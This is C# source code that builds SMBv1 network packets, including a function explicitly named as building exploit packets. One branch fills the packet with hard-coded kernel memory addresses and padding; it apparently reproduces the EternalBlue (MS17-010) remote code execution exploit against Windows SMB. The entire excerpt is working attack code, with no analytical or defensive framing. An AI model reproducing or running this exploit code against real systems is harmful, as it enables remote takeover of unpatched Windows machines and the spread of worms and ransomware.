static public byte[] SetNetBiosHeader(byte[] pkt)
{
uint size = (uint)pkt.Length;
byte[] intBytes = BitConverter.GetBytes(size).Reverse().ToArray();
NETBIOS_HEADER netbios_header = new NETBIOS_HEADER();
netbios_header.MessageTypeAndSize = BitConverter.ToUInt32(intBytes, 0);
byte[] netbios_header_packet = GetBytes(netbios_header);
byte[] fullMessage = netbios_header_packet.Concat(pkt).ToArray();
return(fullMessage);
}
static public byte[] MakeSMB1EchoPacket(ushort TID, ushort UID)
{
NETBIOS_HEADER NTHeader = new NETBIOS_HEADER
{
MessageTypeAndSize = 0x31000000
};
SMB_HEADER header = new SMB_HEADER
{
protocol = 0x424d53ff,
command = 0x2b,
errorClass = 0x00,
_reserved = 0x00,
errorCode = 0x0000,
flags = 0x98,
flags2 = 0xc007,
PIDHigh = 0x0000,
SecurityFeatures = 0x0000000000000000,
reserved = 0x0000,
TID = TID,
PIDLow = 0xfeff,
UID = UID,
MID = 0x0040
};
byte[] headerBytes = GetBytes(NTHeader).Concat(GetBytes(header)).ToArray();
SMB_COM_ECHO_REQUEST echoRequest = new SMB_COM_ECHO_REQUEST
{
WordCount = 0x1,
EchoSequenceNumber = 0x0001,
};
//Add SMBData
List <byte> SMBData = new List <byte>();
SMBData.AddRange(Enumerable.Repeat((byte)0x41, 11));
SMBData.Add(0x00);
echoRequest.ByteCount = (ushort)(SMBData.Count);
//Merge SMBHeader with the echoRequest
byte[] echoRequestBytes = GetBytes(echoRequest).Concat(SMBData.ToArray()).ToArray();
byte[] pkt = headerBytes.Concat(echoRequestBytes).ToArray();
return(pkt);
}
static public byte[] MakeSMB1Trans2ExploitPacket(ushort TID, ushort UID, string type, int time)
{
NETBIOS_HEADER NTHeader = new NETBIOS_HEADER
{
MessageTypeAndSize = 0x35100000
};
SMB_HEADER header = new SMB_HEADER
{
protocol = 0x424d53ff,
command = 0x33,
errorClass = 0x00,
_reserved = 0x00,
errorCode = 0x0000,
flags = 0x18,
flags2 = 0xc007,
PIDHigh = 0x0000,
SecurityFeatures = 0x0000000000000000,
reserved = 0x0000,
TID = TID,
PIDLow = 0xfeff,
UID = UID,
MID = 0x0040
};
byte[] headerBytes = GetBytes(NTHeader).Concat(GetBytes(header)).ToArray();
SMB_COM_TRANSACTION2_SECONDARY_REQUEST transaction2SecondaryRequest = new SMB_COM_TRANSACTION2_SECONDARY_REQUEST
{
WordCount = 0x09,
TotalParameterCount = 0x0102,
TotalDataCount = 0x1000,
ParameterCount = 0x0000,
ParameterOffset = 0x0000,
ParameterDisplacement = 0x0000,
DataCout = 0x1000,
DataOffset = 0x0035,
DataDisplacement = 0x0000, //we change this with our timeout int later
FID = 0x0000,
ByteCount = 0x1000
};
int timeout = (time * 16) + 3;
transaction2SecondaryRequest.DataDisplacement = BitConverter.ToUInt16(new byte[] { 0xd0, BitConverter.GetBytes(timeout)[0] }, 0);
//Merge SMBHeader with the transaction2SecondaryRequest
byte[] transaction2SecondaryRequestBytes = GetBytes(transaction2SecondaryRequest);
byte[] pkt = headerBytes.Concat(transaction2SecondaryRequestBytes).ToArray();
if (type.Equals("eb_trans2_exploit"))
{
List <byte> SMBData = new List <byte>();
SMBData.AddRange(Enumerable.Repeat((byte)0x00, 2957));
SMBData.AddRange(new List <byte>()
{
0x80, 0x00, 0xa8, 0x00
});
SMBData.AddRange(Enumerable.Repeat((byte)0x00, 16));
SMBData.AddRange(new List <byte>()
{
0xff, 0xff
});
SMBData.AddRange(Enumerable.Repeat((byte)0x00, 6));
SMBData.AddRange(new List <byte>()
{
0xff, 0xff
});
SMBData.AddRange(Enumerable.Repeat((byte)0x00, 22));
SMBData.AddRange(new List <byte>()
{
0x00, 0xf1, 0xdf, 0xff // x86 addresses
});
SMBData.AddRange(Enumerable.Repeat((byte)0x00, 8));
SMBData.AddRange(new List <byte>()
{
0x20, 0xf0, 0xdf, 0xff, 0x00, 0xf1, 0xdf, 0xff, 0xff, 0xff, 0xff, 0xff, 0x60, 0x00, 0x04, 0x10
});
SMBData.AddRange(Enumerable.Repeat((byte)0x00, 4));
SMBData.AddRange(new List <byte>()
{
0x80, 0xef, 0xdf, 0xff
});
SMBData.AddRange(Enumerable.Repeat((byte)0x00, 4));
SMBData.AddRange(new List <byte>()
{
0x10, 0x00, 0xd0, 0xff, 0xff, 0xff, 0xff, 0xff, 0x18, 0x01, 0xd0, 0xff, 0xff, 0xff, 0xff, 0xff
});
SMBData.AddRange(Enumerable.Repeat((byte)0x00, 0x10));
SMBData.AddRange(new List <byte>()
{
0x60, 0x00, 0x04, 0x10
});
SMBData.AddRange(Enumerable.Repeat((byte)0x00, 0xc));
SMBData.AddRange(new List <byte>()
{
0x90, 0xff, 0xcf, 0xff, 0xff, 0xff, 0xff, 0xff
});
SMBData.AddRange(Enumerable.Repeat((byte)0x00, 0x8));
SMBData.AddRange(new List <byte>()
{
0x80, 0x10
});
SMBData.AddRange(Enumerable.Repeat((byte)0x00, 0xe));
SMBData.AddRange(new List <byte>()
{
0x39, 0xbb
});
SMBData.AddRange(Enumerable.Repeat((byte)0x41, 965));
pkt = pkt.Concat(SMBData.ToArray()).ToArray();
return(pkt);
}
if (type.Equals("eb_trans2_zero"))
{
List <byte> SMBData = new List <byte>();
SMBData.AddRange(Enumerable.Repeat((byte)0x00, 2055));
SMBData.Add(0x83);
SMBData.Add(0xf3);
SMBData.AddRange(Enumerable.Repeat((byte)0x41, 2039));
pkt = pkt.Concat(SMBData.ToArray()).ToArray(); //Collect it all
return(pkt);
}
else
{
List <byte> SMBData = new List <byte>();
SMBData.AddRange(Enumerable.Repeat((byte)0x41, 4096));
pkt = pkt.Concat(SMBData.ToArray()).ToArray(); //Collect it all
}
return(pkt);
}
